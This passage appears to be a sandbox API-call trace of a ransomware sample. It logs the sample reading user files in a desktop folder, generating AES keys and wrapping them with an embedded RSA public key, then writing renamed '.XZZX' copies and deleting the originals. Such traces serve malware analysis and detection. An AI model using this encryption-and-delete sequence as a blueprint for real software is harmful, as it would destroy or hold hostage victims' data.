3-6w\\uzonnswswgonlesvfl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9f0 [0170.618] ReadFile (in: hFile=0x9f0, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xa7e5, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xa7e5, lpOverlapped=0x0) returned 1 [0170.619] CloseHandle (hObject=0x9f0) returned 1 [0170.619] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0170.619] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0170.619] SetErrorMode (uMode=0x1) returned 0x1 [0170.619] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0170.619] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5be0) returned 1 [0170.621] CryptGenKey (in: hProv=0x43a5be0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5550) returned 1 [0170.746] CryptExportKey (in: hKey=0x3a5550, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.747] CryptExportKey (in: hKey=0x3a5550, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0170.747] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.747] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0170.747] CryptDestroyKey (hKey=0x3a5550) returned 1 [0170.747] CryptReleaseContext (hProv=0x43a5be0, dwFlags=0x0) returned 1 [0170.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\8306832F015A14CA9B3B5FDD03F4F912.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\8306832f015a14ca9b3b5fdd03f4f912.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9fc [0170.748] WriteFile (in: hFile=0x9fc, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xa7e5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xa7e5, lpOverlapped=0x0) returned 1 [0170.749] SetFilePointer (in: hFile=0x9fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa7e5 [0170.749] WriteFile (in: hFile=0x9fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.749] SetFilePointer (in: hFile=0x9fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa7ea [0170.749] WriteFile (in: hFile=0x9fc, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2c, lpOverlapped=0x0) returned 1 [0170.749] SetFilePointer (in: hFile=0x9fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa816 [0170.749] WriteFile (in: hFile=0x9fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.750] SetFilePointer (in: hFile=0x9fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa81b [0170.750] SetErrorMode (uMode=0x1) returned 0x1 [0170.750] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0170.750] OutputDebugStringW (lpOutputString="end") [0170.750] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0170.750] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0170.750] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5be0) returned 1 [0170.750] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5be0, dwCertEncodingType=0x1, pInfo=0x43a2e60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a2e90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a2e98*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3a5550) returned 1 [0170.750] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.751] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0170.751] CryptEncrypt (in: hKey=0x3a5550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0170.751] CryptEncrypt (in: hKey=0x3a5550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5c68*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5c68*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0170.751] WriteFile (in: hFile=0x9fc, lpBuffer=0x43a5c68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5c68*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0170.751] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0170.751] WriteFile (in: hFile=0x9fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0170.751] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0170.751] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0170.751] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0xa00) returned 0x0 [0170.751] RegQueryValueExW (in: hKey=0xa00, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0x104, lpcbData=0x29adfdc*=0x4) returned 0x0 [0170.751] RegCloseKey (hKey=0xa00) returned 0x0 [0170.751] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0xa00) returned 0x0 [0170.752] RegSetValueExW (in: hKey=0xa00, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0x105, cbData=0x4 | out: lpData=0x29adfec*=0x105) returned 0x0 [0170.752] RegCloseKey (hKey=0xa00) returned 0x0 [0170.752] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.752] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.752] CloseHandle (hObject=0x9fc) returned 1 [0170.752] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0170.752] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0170.752] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\UzONnSwswGOnlESVfL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\uzonnswswgonlesvfl.mp3")) returned 1 [0170.753] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\UzONnSwswGOnlESVfL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\uzonnswswgonlesvfl.mp3")) returned 0 Thread: id = 586 os_tid = 0x6a8 [0170.754] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.754] lstrcpyW (in: lpString1=0x2aaf460, lpString2="xtxVVYFEc-NWjSwclj.flv" | out: lpString1="xtxVVYFEc-NWjSwclj.flv") returned="xtxVVYFEc-NWjSwclj.flv" [0170.754] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0170.754] SetErrorMode (uMode=0x1) returned 0x1 [0170.754] lstrcpyW (in: lpString1=0x2aaf860, lpString2="xtxVVYFEc-NWjSwclj.flv" | out: lpString1="xtxVVYFEc-NWjSwclj.flv") returned="xtxVVYFEc-NWjSwclj.flv" [0170.754] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x207838e8, Data2=0x463, Data3=0x45a1, Data4=([0]=0x90, [1]=0xcc, [2]=0xca, [3]=0x5a, [4]=0xf, [5]=0x7d, [6]=0x22, [7]=0x25))) returned 0x0 [0170.754] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\xtxVVYFEc-NWjSwclj.flv") returned 77 [0170.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0170.754] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\6F61A1B801317143207838E803DC558B.XZZX") returned 92 [0170.754] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="XZZX") returned 0x0 [0170.754] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\xtxVVYFEc-NWjSwclj.flv", dwFileAttributes=0x20) returned 1 [0170.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\xtxVVYFEc-NWjSwclj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\xtxvvyfec-nwjswclj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9f4 [0170.755] ReadFile (in: hFile=0x9f4, lpBuffer=0x3de740, nNumberOfBytesToRead=0xd44, lpNumberOfBytesRead=0x2aae418, lpOverlapped=0x0 | out: lpBuffer=0x3de740*, lpNumberOfBytesRead=0x2aae418*=0xd44, lpOverlapped=0x0) returned 1 [0170.756] CloseHandle (hObject=0x9f4) returned 1 [0170.756] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1c60000 [0170.756] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1c70000 [0170.756] SetErrorMode (uMode=0x1) returned 0x1 [0170.756] lstrcpyW (in: lpString1=0x2aae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0170.756] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5cf0) returned 1 [0170.758] CryptGenKey (in: hProv=0x43a5cf0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde998) returned 1 [0170.881] CryptExportKey (in: hKey=0x3cde998, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2aae41c | out: pbData=0x0*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0170.882] CryptExportKey (in: hKey=0x3cde998, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1c70000, pdwDataLen=0x2aae41c | out: pbData=0x1c70000*, pdwDataLen=0x2aae41c*=0x94) returned 1 [0170.882] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.882] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0170.882] CryptDestroyKey (hKey=0x3cde998) returned 1 [0170.882] CryptReleaseContext (hProv=0x43a5cf0, dwFlags=0x0) returned 1 [0170.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\6F61A1B801317143207838E803DC558B.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\6f61a1b801317143207838e803dc558b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9f4 [0170.883] WriteFile (in: hFile=0x9f4, lpBuffer=0x3de740*, nNumberOfBytesToWrite=0xd44, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x3de740*, lpNumberOfBytesWritten=0x2aae438*=0xd44, lpOverlapped=0x0) returned 1 [0170.883] SetFilePointer (in: hFile=0x9f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd44 [0170.883] WriteFile (in: hFile=0x9f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0170.883] SetFilePointer (in: hFile=0x9f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd49 [0170.883] WriteFile (in: hFile=0x9f4, lpBuffer=0x2aaf860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x2aaf860*, lpNumberOfBytesWritten=0x2aae438*=0x2c, lpOverlapped=0x0) returned 1 [0170.883] SetFilePointer (in: hFile=0x9f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd75 [0170.883] WriteFile (in: hFile=0x9f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0170.883] SetFilePointer (in: hFile=0x9f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd7a [0170.883] SetErrorMode (uMode=0x1) returned 0x1 [0170.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0170.883] OutputDebugStringW (lpOutputString="end") [0170.884] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õª\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2aadbf4, pcbBinary=0x2aad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0170.884] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2aadbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8 | out: pvStructInfo=0x2aad3dc, pcbStructInfo=0x2aad3d8) returned 1 [0170.884] CryptAcquireContextW (in: phProv=0x2aad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2aad3e4*=0x43a5cf0) returned 1 [0170.884] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5cf0, dwCertEncodingType=0x1, pInfo=0x43a2f30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43a2f60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x43a2f68*, PublicKey.cUnusedBits=0x0), phKey=0x2aad3ec | out: phKey=0x2aad3ec*=0x3cde998) returned 1 [0170.884] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0170.885] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0170.885] CryptEncrypt (in: hKey=0x3cde998, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2aad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x2aad3f0*=0x80) returned 1 [0170.885] CryptEncrypt (in: hKey=0x3cde998, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a5d78*, pdwDataLen=0x2aad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a5d78*, pdwDataLen=0x2aad3e8*=0x80) returned 1 [0170.885] WriteFile (in: hFile=0x9f4, lpBuffer=0x43a5d78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x43a5d78*, lpNumberOfBytesWritten=0x2aae438*=0x80, lpOverlapped=0x0) returned 1 [0170.885] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0170.885] WriteFile (in: hFile=0x9f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x2aae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x2aae438*=0x5, lpOverlapped=0x0) returned 1 [0170.885] GetUserNameW (in: lpBuffer=0x2aae1f8, pcbBuffer=0x2aadfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2aadfe0) returned 1 [0170.885] wsprintfW (in: param_1=0x2aadff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0170.885] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe4 | out: phkResult=0x2aadfe4*=0xa00) returned 0x0 [0170.885] RegQueryValueExW (in: hKey=0xa00, lpValueName="E1010314", lpReserved=0x0, lpType=0x2aadfd8, lpData=0x2aadfec, lpcbData=0x2aadfdc*=0x4 | out: lpType=0x2aadfd8*=0x4, lpData=0x2aadfec*=0x105, lpcbData=0x2aadfdc*=0x4) returned 0x0 [0170.885] RegCloseKey (hKey=0xa00) returned 0x0 [0170.885] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x2aadfe8 | out: phkResult=0x2aadfe8*=0xa00) returned 0x0 [0170.885] RegSetValueExW (in: hKey=0xa00, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x2aadfec*=0x106, cbData=0x4 | out: lpData=0x2aadfec*=0x106) returned 0x0 [0170.885] RegCloseKey (hKey=0xa00) returned 0x0 [0170.885] VirtualFree (lpAddress=0x1c60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.886] VirtualFree (lpAddress=0x1c70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.886] CloseHandle (hObject=0x9f4) returned 1 [0170.886] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0170.886] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0170.886] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\xtxVVYFEc-NWjSwclj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\xtxvvyfec-nwjswclj.flv")) returned 1 [0170.887] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\xtxVVYFEc-NWjSwclj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zbiozr_ 3-6w\\xtxvvyfec-nwjswclj.flv")) returned 0 Thread: id = 587 os_tid = 0x77c [0170.889] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0170.889] lstrcpyW (in: lpString1=0x29af460, lpString2="zKa6.xls" | out: lpString1="zKa6.xls") returned="zKa6.xls" [0170.889] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0170.889] SetErrorMode (uMode=0x1) returned 0x1 [0170.889] lstrcpyW (in: lpString1=0x29af860, lpString2="zKa6.xls" | out: lpString1="zKa6.xls") returned="zKa6.xls" [0170.889] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xfa07adc9, Data2=0x97c1, Data3=0x4bc7, Data4=([0]=0xa8, [1]=0x72, [2]=0x5a, [3]=0x95, [4]=0xbc, [5]=0x92, [6]=0x37, [7]=0x11))) returned 0x0 [0170.889] wsprintfW (in: param_1=0x29aec60, 